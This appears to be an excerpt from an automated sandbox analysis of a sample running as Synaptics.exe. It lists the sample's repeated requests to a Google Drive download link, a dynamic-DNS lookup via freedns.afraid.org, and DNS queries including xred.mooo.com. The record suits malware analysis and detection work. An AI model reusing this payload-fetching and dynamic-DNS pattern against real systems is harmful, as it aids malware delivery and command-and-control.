                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=KFqQg1bEkvlzCW_5M8tl1ZoXcoroQmTcD27VO8H7jnqnnpOFpcye-smSY-qZf-leJ_B_59FDO6XvXPlRN0Uo_zYkRyPymg18M9p01mUlUX26In6efzH74PeHZ2fM1P9IV7NAGbB7qXI-nSZxKKLfYSJtYzrtMMKp3IkoLCbHzYh3YgI0b54XUzY
                                Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                                Source: Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                                Source: global trafficDNS traffic detected: DNS query: docs.google.com
                                Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                                Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
